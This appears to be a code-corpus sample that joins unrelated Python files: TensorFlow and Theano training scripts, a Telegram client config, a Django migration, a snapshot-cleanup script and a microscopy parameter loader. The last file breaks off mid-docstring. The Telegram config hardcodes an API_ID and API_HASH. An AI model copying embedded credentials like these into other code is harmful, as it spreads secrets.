def MoveHeadStopped():
    """Re-centre the head when the clock stops."""
    if IcanMoveHeadRandom==1:
        i01.moveHead(90,90)
        # NOTE(review): HeadSide is never defined in this script -- confirm
        # the InMoov runtime creates it before stopClock() can fire.
        HeadSide.moveTo(90)
# Invoked when MoveHeadTimer.startClock() fires.
def MoveHeadStart():
    """Kick off an immediate random move when the clock starts."""
    MoveHeadRandomize()
MoveHeadTimer.addListener("pulse", python.name, "MoveHead")
MoveHeadTimer.addListener("clockStopped", python.name, "MoveHeadStopped")
MoveHeadTimer.addListener("clockStarted", python.name, "MoveHeadStart")
# Start the clock.
MoveHeadTimer.startClock()
# Enable random head motion for 10 seconds, then freeze.
IcanMoveHeadRandom=1
sleep(10)
IcanMoveHeadRandom=0
|
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.python.ops import control_flow_ops
import ssd_mobilenet_v1 as ssd
from datasets import dataset_factory
from preprocessing import preprocessing_factory
import tf_utils
import os
import pdb
slim = tf.contrib.slim  # TF-Slim (TF 1.x API; tf.contrib was removed in TF 2.x)
# Command-line configuration for SSD-MobileNetV1 training, declared via the
# TF 1.x tf.app.flags mechanism. Values are read through FLAGS in main().
# ssd network flags
tf.app.flags.DEFINE_float(
    'match_threshold', 0.5, 'Matching threshold in the loss function.')
tf.app.flags.DEFINE_float(
    'loss_alpha', 1., 'Alpha parameter in the loss function.')
tf.app.flags.DEFINE_float(
    'negative_ratio', 3., 'Negative ratio in the loss function.')
# General flags
tf.app.flags.DEFINE_integer(
    'num_readers', 4,
    'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_string(
    'train_dir', './logs',
    'Directory where checkpoints and event logs are written to.')
tf.app.flags.DEFINE_integer(
    'num_preprocessing_threads', 4,
    'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
    'log_every_n_steps', 10,
    'The frequency with which logs are print.')
tf.app.flags.DEFINE_integer(
    'save_summaries_secs', 600,
    'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
    'save_interval_secs', 600,
    'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_float(
    'gpu_memory_fraction', 0.5, 'GPU memory fraction to use.')
# learning rate flags.
tf.app.flags.DEFINE_string(
    'learning_rate_decay_type',
    'exponential',
    'Specifies how the learning rate is decayed. One of "fixed", "exponential",'
    ' or "polynomial"')
tf.app.flags.DEFINE_float(
    "learning_rate_decay_factor",
    0.94,"Learning rate decay factor.")
tf.app.flags.DEFINE_float(
    "num_epochs_per_decay",2.0,
    "Number of epochs after which learning rate decays.")
tf.app.flags.DEFINE_float(
    "learning_rate",0.01,"Initial learning rate.")
tf.app.flags.DEFINE_float(
    "end_learning_rate",0.0001,"The minimum end learning rate used by polynomial decay learning rate.")
tf.app.flags.DEFINE_float(
    'moving_average_decay', 0.9999,
    'The decay to use for the moving average.'
    'If left as None, then moving averages are not used.')
# optimization flags, only support RMSprop in this version
tf.app.flags.DEFINE_float(
    "weight_decay",0.00004,"The weight decay on the model weights.")
tf.app.flags.DEFINE_float(
    'label_smoothing', 0.0, 'The amount of label smoothing.')
tf.app.flags.DEFINE_string(
    "optimizer","rmsprop",
    "The name of the optimizer, only support `rmsprop`.")
tf.app.flags.DEFINE_float(
    'momentum', 0.9,
    'The momentum for the MomentumOptimizer and RMSPropOptimizer.')
tf.app.flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum.')
tf.app.flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.')
tf.app.flags.DEFINE_float('opt_epsilon', 1.0, 'Epsilon term for the optimizer.')
# dataset flags
tf.app.flags.DEFINE_string(
    'dataset_name', 'pascalvoc_2007', 'The name of the dataset to load.')
tf.app.flags.DEFINE_integer(
    'num_classes', 21, 'Number of classes to use in the dataset.')
tf.app.flags.DEFINE_string(
    'dataset_split_name', 'train', 'The name of the train/test split.')
tf.app.flags.DEFINE_string(
    'dataset_dir', None, 'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_string(
    'preprocessing_name', "ssd_512_vgg", 'The name of the preprocessing to use.')
tf.app.flags.DEFINE_integer(
    'batch_size', 32, 'The number of samples in each batch.')
tf.app.flags.DEFINE_integer(
    'train_image_size', None, 'Train image size')
tf.app.flags.DEFINE_integer('max_number_of_steps', None,
                            'The maximum number of training steps.')
# fine-tuning flags
tf.app.flags.DEFINE_string(
    'checkpoint_path', None,
    'The path to a checkpoint from which to fine-tune.')
tf.app.flags.DEFINE_string(
    'trainable_scopes', None,
    'Comma-separated list of scopes to filter the set of variables to train.'
    'By default, None would train all the variables.')
tf.app.flags.DEFINE_boolean(
    'ignore_missing_vars', True,
    'When restoring a checkpoint would ignore missing variables.')
tf.app.flags.DEFINE_boolean(
    'train_on_cpu', False,
    'Set as `True` will make use of CPU for training.')
tf.app.flags.DEFINE_string(
    "gpu_device","0",
    "Set used gpu id for training.")
tf.app.flags.DEFINE_boolean("allow_growth",True,
    "If allow increasing use of memory of GPU.")
FLAGS = tf.app.flags.FLAGS
def main(_):
    """Build the SSD-MobileNetV1 training graph and train with slim.

    All configuration comes from the module-level tf.app.flags (TF 1.x).
    Requires --dataset_dir; fine-tunes from --checkpoint_path.
    """
    # Pin training to CPU or the requested GPU(s) before building the graph.
    if FLAGS.train_on_cpu:
        os.environ["CUDA_VISIBLE_DEVICES"]="-1"
    else:
        os.environ["CUDA_VISIBLE_DEVICES"]=FLAGS.gpu_device
    if not FLAGS.dataset_dir:
        raise ValueError("You must supply the dataset directory with --dataset-dir.")
    tf.logging.set_verbosity(tf.logging.DEBUG)
    g = tf.Graph()
    with g.as_default():
        # select the dataset
        dataset = dataset_factory.get_dataset(
            FLAGS.dataset_name, FLAGS.dataset_split_name,FLAGS.dataset_dir)
        # create global step, used for optimizer moving average decay
        with tf.device("/cpu:0"):
            global_step = tf.train.create_global_step()
        # pdb.set_trace()
        # get the ssd network and its anchors
        ssd_cls = ssd.SSDnet
        ssd_params = ssd_cls.default_params._replace(num_classes=FLAGS.num_classes)
        ssd_net = ssd_cls(ssd_params)
        image_size = ssd_net.params.img_shape
        ssd_anchors = ssd_net.anchors(img_shape=image_size)
        # select the preprocessing function
        preprocessing_name = FLAGS.preprocessing_name
        image_preprocessing_fn = preprocessing_factory.get_preprocessing(
            preprocessing_name,is_training=True)
        tf_utils.print_configuration(FLAGS.__flags,ssd_params,
                                     dataset.data_sources,FLAGS.train_dir)
        # create a dataset provider and batches (input pipeline on CPU).
        with tf.device("/cpu:0"):
            with tf.name_scope(FLAGS.dataset_name+"_data_provider"):
                provider = slim.dataset_data_provider.DatasetDataProvider(
                    dataset,
                    num_readers=FLAGS.num_readers,
                    common_queue_capacity=20*FLAGS.batch_size,
                    common_queue_min=10*FLAGS.batch_size,
                    shuffle=True)
            # get for ssd network: image,labels,bboxes
            [image,shape,glabels,gbboxes] = provider.get(["image","shape",
                                                         "object/label",
                                                         "object/bbox"])
            # pdb.set_trace()
            # preprocessing (augmentation + resize to the network input shape)
            image,glabels,gbboxes = \
                image_preprocessing_fn(image,
                                       glabels,gbboxes,
                                       out_shape=image_size,
                                       data_format="NHWC")
            # encode groundtruth labels and bboxes against the anchor grid
            gclasses,glocalisations,gscores= \
                ssd_net.bboxes_encode(glabels,gbboxes,ssd_anchors)
            batch_shape = [1] + [len(ssd_anchors)] * 3
            # training batches and queue
            r = tf.train.batch(
                tf_utils.reshape_list([image, gclasses, glocalisations, gscores]),
                batch_size=FLAGS.batch_size,
                num_threads=FLAGS.num_preprocessing_threads,
                capacity=5*FLAGS.batch_size)
            b_image,b_gclasses,b_glocalisations,b_gscores = \
                tf_utils.reshape_list(r,batch_shape)
            # prefetch queue
            batch_queue = slim.prefetch_queue.prefetch_queue(
                tf_utils.reshape_list([b_image,b_gclasses,b_glocalisations,b_gscores]),
                capacity = 8)
        # dequeue batch
        b_image, b_gclasses, b_glocalisations, b_gscores = \
            tf_utils.reshape_list(batch_queue.dequeue(), batch_shape)
        # gather initial summaries
        summaries = set(tf.get_collection(tf.GraphKeys.SUMMARIES))
        arg_scope = ssd_net.arg_scope(weight_decay=FLAGS.weight_decay)
        with slim.arg_scope(arg_scope):
            predictions,localisations,logits,end_points,mobilenet_var_list = \
                ssd_net.net(b_image,is_training=True)
        # add loss function (populates the LOSSES collection)
        ssd_net.losses(logits,localisations,
                       b_gclasses,b_glocalisations,b_gscores,
                       match_threshold=FLAGS.match_threshold,
                       negative_ratio=FLAGS.negative_ratio,
                       alpha=FLAGS.loss_alpha,
                       label_smoothing=FLAGS.label_smoothing)
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
        # add summaries for end_points
        for end_point in end_points:
            x = end_points[end_point]
            summaries.add(tf.summary.histogram("activations/"+end_point,x))
            summaries.add(tf.summary.scalar("sparsity/"+end_point,
                                            tf.nn.zero_fraction(x)))
        # add summaries for losses and extra losses
        for loss in tf.get_collection(tf.GraphKeys.LOSSES):
            summaries.add(tf.summary.scalar(loss.op.name,loss))
        for loss in tf.get_collection("EXTRA_LOSSES"):
            summaries.add(tf.summary.scalar(loss.op.name,loss))
        # add summaries for variables
        for var in slim.get_model_variables():
            summaries.add(tf.summary.histogram(var.op.name,var))
        # configure the moving averages
        if FLAGS.moving_average_decay: # use moving average decay on weights variables
            moving_average_variables = slim.get_model_variables()
            variable_averages = tf.train.ExponentialMovingAverage(
                FLAGS.moving_average_decay,global_step)
        else:
            moving_average_variables,variable_averages = None,None
        # configure the optimization procedure
        with tf.device("/cpu:0"):
            learning_rate = tf_utils.configure_learning_rate(FLAGS,
                                                             dataset.num_samples,global_step)
            optimizer = tf_utils.configure_optimizer(FLAGS,learning_rate)
            summaries.add(tf.summary.scalar("learning_rate",learning_rate))
        if FLAGS.moving_average_decay:
            # update ops executed by trainer
            update_ops.append(variable_averages.apply(moving_average_variables))
        # get variables to train
        variables_to_train = tf_utils.get_variables_to_train(FLAGS)
        # return a train tensor and summary op
        total_losses = tf.get_collection(tf.GraphKeys.LOSSES)
        total_loss = tf.add_n(total_losses,name="total_loss")
        summaries.add(tf.summary.scalar("total_loss",total_loss))
        # create gradient updates
        grads = optimizer.compute_gradients(total_loss,var_list=variables_to_train)
        grad_updates = optimizer.apply_gradients(grads,global_step=global_step)
        update_ops.append(grad_updates)
        # create train op: running it applies all updates, then yields total_loss
        update_op = tf.group(*update_ops)
        train_tensor = control_flow_ops.with_dependencies([update_op],total_loss,
                                                          name="train_op")
        # merge all summaries together
        summary_op = tf.summary.merge(list(summaries),name="summary_op")
        # start training
        gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction,allow_growth=FLAGS.allow_growth)
        config = tf.ConfigProto(log_device_placement=False,
                                gpu_options=gpu_options)
        saver = tf.train.Saver(max_to_keep=2,
                               keep_checkpoint_every_n_hours=1.0,
                               write_version=2,
                               pad_step_number=False)
        # create initial assignment op (restore fine-tune weights from checkpoint)
        init_assign_op,init_feed_dict = slim.assign_from_checkpoint(
            FLAGS.checkpoint_path,mobilenet_var_list,
            ignore_missing_vars=FLAGS.ignore_missing_vars)
        # create an initial assignment function
        # NOTE(review): if the checkpoint holds no "global_step" entry, g_step
        # is never bound and the next line raises NameError -- confirm the
        # checkpoint always contains a global_step.
        for k,v in init_feed_dict.items():
            if "global_step" in k.name:
                g_step = k
        init_feed_dict[g_step] = 0 # change the global_step to zero.
        init_fn = lambda sess: sess.run(init_assign_op,init_feed_dict)
        # run training
        slim.learning.train(train_tensor,logdir=FLAGS.train_dir,
                            init_fn=init_fn,
                            summary_op=summary_op,
                            number_of_steps=FLAGS.max_number_of_steps,
                            save_summaries_secs=FLAGS.save_summaries_secs,
                            save_interval_secs=FLAGS.save_interval_secs,
                            session_config=config,
                            saver=saver,
                            )
        # slim.learning.train(
        #     train_tensor,
        #     logdir=FLAGS.train_dir,
        #     init_fn =tf_utils.get_init_fn(FLAGS,mobilenet_var_list),
        #     summary_op=summary_op,
        #     global_step=global_step,
        #     number_of_steps=FLAGS.max_number_of_steps,
        #     log_every_n_steps=FLAGS.log_every_n_steps,
        #     save_summaries_secs=FLAGS.save_summaries_secs,
        #     saver=saver,
        #     save_interval_secs =FLAGS.save_interval_secs,
        #     session_config=config,
        #     sync_optimizer=None)
if __name__ == '__main__':
    tf.app.run()
|
"""
Copyright (c) 2016, Jose Dolz .All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
Jose Dolz. April, 2018.
email: jose.dolz.upv@gmail.com
LIVIA Department, ETS, Montreal.
"""
import pdb
import os
from HyperDenseNet import HyperDenseNet3D
from Modules.General.Utils import dump_model_to_gzip_file
from Modules.General.Utils import makeFolder
from Modules.Parsers.parsersUtils import parserConfigIni
def generateNetwork(configIniName) :
    """Create, compile and save an initial HyperDenseNet3D model.

    Reads section 0 of the given .ini config, prints the configuration,
    builds and compiles the Theano network, saves it gzipped as
    <networkName>_Epoch0, and returns the saved model file path.

    NOTE: this module is Python 2 (print statements, xrange).
    """
    myParserConfigIni = parserConfigIni()
    # Section 0 of the ini file holds the model-creation settings.
    myParserConfigIni.readConfigIniFile(configIniName,0)
    print " ********************** Starting creation model **********************"
    print " ------------------------ General ------------------------ "
    print " - Network name: {}".format(myParserConfigIni.networkName)
    print " - Folder to save the outputs: {}".format(myParserConfigIni.folderName)
    print " ------------------------ CNN Architecture ------------------------ "
    print " - Number of classes: {}".format(myParserConfigIni.n_classes)
    print " - Layers: {}".format(myParserConfigIni.layers)
    print " - Kernel sizes: {}".format(myParserConfigIni.kernels)
    print " - Intermediate connected CNN layers: {}".format(myParserConfigIni.intermediate_ConnectedLayers)
    print " - Pooling: {}".format(myParserConfigIni.pooling_scales)
    print " - Dropout: {}".format(myParserConfigIni.dropout_Rates)
    # Dispatch tables below only pretty-print the selected options; the
    # numeric codes themselves are passed to createNetwork unchanged.
    def Linear():
        print " --- Activation function: Linear"
    def ReLU():
        print " --- Activation function: ReLU"
    def PReLU():
        print " --- Activation function: PReLU"
    def LeakyReLU():
        print " --- Activation function: Leaky ReLU"
    printActivationFunction = {0 : Linear,
                               1 : ReLU,
                               2 : PReLU,
                               3 : LeakyReLU}
    printActivationFunction[myParserConfigIni.activationType]()
    def Random(layerType):
        print " --- Weights initialization (" +layerType+ " Layers): Random"
    def Delving(layerType):
        print " --- Weights initialization (" +layerType+ " Layers): Delving"
    def PreTrained(layerType):
        print " --- Weights initialization (" +layerType+ " Layers): PreTrained"
    printweight_Initialization_CNN = {0 : Random,
                                      1 : Delving,
                                      2 : PreTrained}
    printweight_Initialization_CNN[myParserConfigIni.weight_Initialization_CNN]('CNN')
    printweight_Initialization_CNN[myParserConfigIni.weight_Initialization_FCN]('FCN')
    print " ------------------------ Training Parameters ------------------------ "
    # learning_rate may be one global value or one value per layer.
    if len(myParserConfigIni.learning_rate) == 1:
        print " - Learning rate: {}".format(myParserConfigIni.learning_rate)
    else:
        for i in xrange(len(myParserConfigIni.learning_rate)):
            print " - Learning rate at layer {} : {} ".format(str(i+1),myParserConfigIni.learning_rate[i])
    print " - Batch size: {}".format(myParserConfigIni.batch_size)
    if myParserConfigIni.applyBatchNorm == True:
        print " - Apply batch normalization in {} epochs".format(myParserConfigIni.BatchNormEpochs)
    print " ------------------------ Size of samples ------------------------ "
    print " - Training: {}".format(myParserConfigIni.sampleSize_Train)
    print " - Testing: {}".format(myParserConfigIni.sampleSize_Test)
    # --------------- Create my LiviaSemiDenseNet3D object ---------------
    myHyperDenseNet3D = HyperDenseNet3D()
    # --------------- Create the whole architecture (Conv layers + fully connected layers + classification layer) ---------------
    myHyperDenseNet3D.createNetwork(myParserConfigIni.networkName,
                                    myParserConfigIni.folderName,
                                    myParserConfigIni.layers,
                                    myParserConfigIni.kernels,
                                    myParserConfigIni.intermediate_ConnectedLayers,
                                    myParserConfigIni.n_classes,
                                    myParserConfigIni.sampleSize_Train,
                                    myParserConfigIni.sampleSize_Test,
                                    myParserConfigIni.batch_size,
                                    myParserConfigIni.applyBatchNorm,
                                    myParserConfigIni.BatchNormEpochs,
                                    myParserConfigIni.activationType,
                                    myParserConfigIni.dropout_Rates,
                                    myParserConfigIni.pooling_scales,
                                    myParserConfigIni.weight_Initialization_CNN,
                                    myParserConfigIni.weight_Initialization_FCN,
                                    myParserConfigIni.weightsFolderName,
                                    myParserConfigIni.weightsTrainedIdx,
                                    myParserConfigIni.tempSoftMax
                                    )
    # TODO: Specify also the weights if pre-trained
    # --------------- Initialize all the training parameters ---------------
    myHyperDenseNet3D.initTrainingParameters(myParserConfigIni.costFunction,
                                             myParserConfigIni.L1_reg_C,
                                             myParserConfigIni.L2_reg_C,
                                             myParserConfigIni.learning_rate,
                                             myParserConfigIni.momentumType,
                                             myParserConfigIni.momentumValue,
                                             myParserConfigIni.momentumNormalized,
                                             myParserConfigIni.optimizerType,
                                             myParserConfigIni.rho_RMSProp,
                                             myParserConfigIni.epsilon_RMSProp
                                             )
    # --------------- Compile the functions (Training/Validation/Testing) ---------------
    myHyperDenseNet3D.compileTheanoFunctions()
    # --------------- Save the model ---------------
    # Generate folders to store the model
    BASE_DIR = os.getcwd()
    path_Temp = os.path.join(BASE_DIR,'outputFiles')
    # For the networks
    netFolderName = os.path.join(path_Temp,myParserConfigIni.folderName)
    netFolderName = os.path.join(netFolderName,'Networks')
    # For the predictions
    predlFolderName = os.path.join(path_Temp,myParserConfigIni.folderName)
    predlFolderName = os.path.join(predlFolderName,'Pred')
    predValFolderName = os.path.join(predlFolderName,'Validation')
    predTestFolderName = os.path.join(predlFolderName,'Testing')
    makeFolder(netFolderName, "Networks")
    makeFolder(predValFolderName, "to store predictions (Validation)")
    makeFolder(predTestFolderName, "to store predictions (Testing)")
    print('------- Saving model (Be patient :) ).... ------')
    # Serialize the freshly built (epoch-0) model to a gzipped pickle.
    modelFileName = netFolderName + "/" + myParserConfigIni.networkName + "_Epoch0"
    dump_model_to_gzip_file(myHyperDenseNet3D, modelFileName)
    strFinal = " Network model saved in " + netFolderName + " as " + myParserConfigIni.networkName + "_Epoch0"
    print strFinal
    return modelFileName
|
"""
Every parameter (except for CONFIG_FILE) can be
overwritten by external config file
"""
import mailcap
import os
import platform
import runpy
from typing import Any, Dict, List, Optional, Tuple
# Platform detection; mailcap supplies the user's preferred handlers.
_os_name = platform.system()
_linux = "Linux"
_global_mailcap = mailcap.getcaps()
# --- File-system locations ---
CONFIG_DIR: str = os.path.expanduser("~/.config/arigram/")
CONFIG_FILE: str = os.path.join(CONFIG_DIR, "config.py")
FILES_DIR: str = os.path.expanduser("~/.cache/arigram/")
DRAFTS_FILE: str = os.path.join(FILES_DIR, "drafts.json")
MAILCAP_FILE: Optional[str] = None
LOG_LEVEL: str = "INFO"
LOG_PATH: str = os.path.expanduser("~/.local/share/arigram/")
# --- Telegram API credentials (overridable via the user config file) ---
API_ID: str = "559815"
API_HASH: str = "fd121358f59d764c57c55871aa0807ca"
PHONE: Optional[str] = None
ENC_KEY: str = ""
TDLIB_PATH: Optional[str] = None
TDLIB_VERBOSITY: int = 0
MAX_DOWNLOAD_SIZE: str = "10MB"
NOTIFY_FUNCTION: Optional[Any] = None
VIEW_TEXT_CMD: str = "less"
# for more info see https://trac.ffmpeg.org/wiki/Capture/ALSA
# Linux records via ALSA, other platforms via avfoundation (macOS).
VOICE_RECORD_CMD: str = (
    "ffmpeg -f alsa -i hw:0 -c:a libopus -b:a 32k {file_path}"
    if _os_name == _linux
    else "ffmpeg -f avfoundation -i ':0' -c:a libopus -b:a 32k {file_path}"
)
# Prefer the mailcap handler for text/markdown over $EDITOR when present.
EDITOR: str = os.environ.get("EDITOR", "vim")
_, __MAILCAP_EDITOR = mailcap.findmatch(_global_mailcap, "text/markdown")
if __MAILCAP_EDITOR:
    EDITOR = str(__MAILCAP_EDITOR["view"]).split(" ", 1)[0]
LONG_MSG_CMD: str = f"{EDITOR} '{{file_path}}'"
DEFAULT_OPEN: str = (
    "xdg-open {file_path}" if _os_name == _linux else "open {file_path}"
)
CHAT_FLAGS: Dict[str, str] = {}
MSG_FLAGS: Dict[str, str] = {}
ICON_PATH: str = os.path.join(
    os.path.dirname(__file__), "resources", "arigram.png"
)
URL_VIEW: Optional[str] = None
USERS_COLOURS: Tuple[int, ...] = tuple(range(2, 16))
KEEP_MEDIA: int = 7
FILE_PICKER_CMD: Optional[str] = None
DOWNLOAD_DIR: str = os.path.expanduser("~/Downloads/")
EXTRA_FILE_CHOOSER_PATHS: List[str] = ["..", "/", "~"]
CUSTOM_KEYBINDS: Dict[str, Dict[str, Any]] = {}
TRUNCATE_LIMIT: int = 15
EXTRA_TDLIB_HEADEARS: Dict[Any, Any] = {}
# Execute the user's config.py and let any UPPERCASE name it defines
# override the defaults declared above.
if os.path.isfile(CONFIG_FILE):
    config_params = runpy.run_path(CONFIG_FILE)  # type: ignore
    for param, value in config_params.items():
        if param.isupper():
            globals()[param] = value
else:
    os.makedirs(CONFIG_DIR, exist_ok=True)
# First run (or no PHONE configured): prompt and persist it to config.py.
if not PHONE:
    print(
        "Enter your phone number in international format, including country code (example: +5037754762346)"
    )
    PHONE = input("(phone) ")
    if not PHONE.startswith("+"):
        PHONE = "+" + PHONE
    with open(CONFIG_FILE, "a") as f:
        f.write(f'\nPHONE = "{PHONE}"\n')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2017-02-09 02:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds TaskSupporter.additional_points: a non-negative small integer
    # defaulting to 0.
    dependencies = [
        ('dominion', '0006_auto_20170201_0444'),
    ]
    operations = [
        migrations.AddField(
            model_name='tasksupporter',
            name='additional_points',
            # NOTE(review): `blank` expects a bool; blank=0 behaves as
            # blank=False. If the intent was to allow blank form input
            # (mirroring default=0), this should have been blank=True --
            # confirm before touching an already-applied migration.
            field=models.PositiveSmallIntegerField(blank=0, default=0),
        ),
    ]
|
#!/usr/bin/env python3
'''Go through the files in the current directory and remove and caffemodel/solverstate
files where there is a higher iteration available'''
import glob,re,sys,collections,os
# Command-line arguments are the directories to scan; default to the cwd.
prefixes = sys.argv[1:]
if not prefixes:
    prefixes = ['.']
for prefix in prefixes:
    for suffix in ['caffemodel', 'solverstate']:
        # Group snapshot files by their basename (everything before _iter_N).
        snapshots = collections.defaultdict(list)
        for fname in glob.glob('%s/*.%s' % (prefix, suffix)):
            # Raw string so \d is a regex digit class, not a string escape.
            m = re.search(r'(.*)_iter_(\d+)\.%s' % suffix, fname)
            if m:
                # Bug fix: the original assigned m.group(1) to `prefix`,
                # clobbering the outer loop variable and corrupting the glob
                # pattern used for the next suffix/directory iteration.
                base = m.group(1)
                iteration = int(m.group(2))
                snapshots[base].append((iteration, fname))
        for base, versions in snapshots.items():
            # Keep only the highest iteration; delete every older snapshot.
            toremove = sorted(versions, reverse=True)[1:]
            for (iteration, fname) in toremove:
                print(fname)
                os.remove(fname)
|
#!/usr/bin/python
import numpy as np
import os
import sys
# ====================== constants
# Unit conversions: eV/Angstrom -> nN, and the Coulomb prefactor in eV*A/e^2.
eVA_Nm = 16.0217657
CoulombConst = -14.3996448915
# default parameters of simulation
# Fix: np.int was a deprecated alias removed in numpy>=1.24; the builtin int
# yields the same default integer dtype.
params = {
    'PBC': True,                                    # periodic boundary conditions on/off
    'nPBC': np.array([1, 1, 1]),                    # number of periodic images per axis
    'gridN': np.array([-1, -1, -1]).astype(int),    # grid resolution; <=0 means "derive from cell"
    'gridA': np.array([12.798, -7.3889, 0.00000]),  # cell vector A (Angstrom)
    'gridB': np.array([12.798, 7.3889, 0.00000]),   # cell vector B
    'gridC': np.array([0, 0, 5.0]),                 # cell vector C
    'moleculeShift': np.array([0.0, 0.0, 0.0]),
    'probeType': '8',                               # probe particle: element number or symbol
    'charge': 0.00,                                 # probe charge (e)
    'useLJ': True,
    'r0Probe': np.array([0.00, 0.00, 4.00]),        # probe equilibrium position w.r.t. tip apex
    'stiffness': np.array([0.5, 0.5, 20.00]),       # probe-tip spring constants (N/m)
    'tip': 's',                                     # tip charge multipole model
    'sigma': 0.7,
    'scanStep': np.array([0.10, 0.10, 0.10]),
    'scanMin': np.array([0.0, 0.0, 5.0]),
    'scanMax': np.array([20.0, 20.0, 8.0]),
    'kCantilever': 1800.0,                          # cantilever stiffness (N/m)
    'f0Cantilever': 30300.0,                        # cantilever resonance frequency (Hz)
    'Amplitude': 1.0,
    'plotSliceFrom': 16,
    'plotSliceTo': 22,
    'plotSliceBy': 1,
    'imageInterpolation': 'bicubic',
    'colorscale': 'gray',
    'ddisp': 0.05,
    'tip_base': np.array(['None', 0.00]),           # (model name, charge) for the tip base
}
# ==============================
# ============================== Pure python functions
# ==============================
def Fz2df( F, dz=0.1, k0 = params['kCantilever'], f0=params['f0Cantilever'], n=4, units=16.0217656 ):
    """
    Convert a vertical-force array Fz to a frequency-shift array.

    Follows Giessibl, Appl. Phys. Lett. 78, 123 (2001): the force is
    convolved along axis 0 with a semicircular weight whose width models a
    cantilever oscillation amplitude A = n * dz.
    """
    grid = np.linspace(-1, 1, int(n + 1))
    semicircle = np.sqrt(1 - grid * grid)
    kernel = (semicircle[1:] - semicircle[:-1]) / (dz * n)
    # small-n correction factor
    fpi = (n - 2) ** 2
    prefactor = (1 + fpi * (2 / np.pi)) / (fpi + 1)
    convolved = np.apply_along_axis(
        lambda column: np.convolve(column, kernel, mode='valid'), axis=0, arr=F)
    return (-prefactor * convolved) * units * f0 / k0
# ==============================
# ============================== server interface file I/O
# ==============================
# overide default parameters by parameters read from a file
def loadParams( fname, FFparams=None ):
    """
    Override entries of the global ``params`` dict from a key/value text file.

    Each line is ``key value [value value]``; the value(s) are coerced to the
    type of the existing entry (bool, float, int, str, or for ndarray entries
    a 3-vector of floats/ints, else a (str, float) pair as in 'tip_base').
    Afterwards a non-positive gridN is derived from the cell vectors
    (~10 points per Angstrom) and a string probeType is resolved to an
    element index via FFparams.

    Raises:
        ValueError: if probeType is a symbol and FFparams is None, or the
            symbol is not found in FFparams.
    """
    print(" >> OVERWRITING SETTINGS by "+fname)
    with open(fname, 'r') as fin:  # fixed: file is closed even on error
        for line in fin:
            words = line.split()
            if len(words) < 2:
                continue
            key = words[0]
            if key not in params:
                continue
            val = params[key]
            print(key,' is class ', val.__class__)
            # bool must be tested before int/float (bool is an int subclass)
            if isinstance(val, bool):
                word = words[1].strip()
                params[key] = word[0] in ('T', 't')
                print(key, params[key], ">>",word,"<<")
            elif isinstance(val, float):
                params[key] = float(words[1])
                print(key, params[key], words[1])
            elif isinstance(val, int):
                params[key] = int(words[1])
                print(key, params[key], words[1])
            elif isinstance(val, str):
                params[key] = words[1]
                print(key, params[key], words[1])
            elif isinstance(val, np.ndarray):
                # fixed: np.float / np.int were deprecated aliases removed in
                # numpy>=1.24; test the dtype family instead.
                if np.issubdtype(val.dtype, np.floating):
                    params[key] = np.array([float(words[1]), float(words[2]), float(words[3])])
                    print(key, params[key], words[1], words[2], words[3])
                elif np.issubdtype(val.dtype, np.integer):
                    print(key)
                    params[key] = np.array([int(words[1]), int(words[2]), int(words[3])])
                    print(key, params[key], words[1], words[2], words[3])
                else:  # string-valued array, e.g. tip_base: (name, charge)
                    params[key] = np.array([str(words[1]), float(words[2])])
                    print(key, params[key], words[1], words[2])
    if params["gridN"][0] <= 0:
        # Grid resolution not supplied: default to ~10 points per Angstrom.
        params["gridN"][0] = round(np.linalg.norm(params["gridA"])*10)
        params["gridN"][1] = round(np.linalg.norm(params["gridB"])*10)
        params["gridN"][2] = round(np.linalg.norm(params["gridC"])*10)
    try:
        params['probeType'] = int(params['probeType'])
    except ValueError:
        if FFparams is None:
            raise ValueError("if the ProbeParticle type is defined as "
                             "string, you have to provide parameter FFparams to the "
                             "loadParams function")
        # Map element symbol -> 1-based index into FFparams.
        elem_dict = {}
        for i, ff in enumerate(FFparams):
            elem_dict[ff[3]] = i+1
        try:
            params['probeType'] = elem_dict[params['probeType']]
        except KeyError:
            raise ValueError("The element {} for the ProbeParticle "
                             "was not found".format(params['probeType']))
    # Strip quote marks so quoted values in params.ini still work.
    params["tip"] = params["tip"].replace('"', '').replace("'", '')
    params["tip_base"][0] = params["tip_base"][0].replace('"', '').replace("'", '')
# load atoms species parameters form a file ( currently used to load Lenard-Jones parameters )
def loadSpecies( fname ):
    """
    Load per-species Lennard-Jones parameters from a whitespace-separated
    text file with rows ``rmin epsilon atomic_number symbol``.

    Returns a numpy structured array with fields
    ('rmin', 'epsilon', 'atom', 'symbol').
    """
    # Fix: np.int was a deprecated alias removed in numpy>=1.24; the builtin
    # int maps to the same default integer dtype.
    FFparams = np.genfromtxt(fname,
                             dtype=[('rmin', np.float64), ('epsilon', np.float64),
                                    ('atom', int), ('symbol', '|S10')],
                             usecols=[0, 1, 2, 3])
    return FFparams
def autoGeom( Rs, shiftXY=False, fitCell=False, border=3.0 ):
    """
    Fit the force-field / scanning supercell to a geometry and optionally
